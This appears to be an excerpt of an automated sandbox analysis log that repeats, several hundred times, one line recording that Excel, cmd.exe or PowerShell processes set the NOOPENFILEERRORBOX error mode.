      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
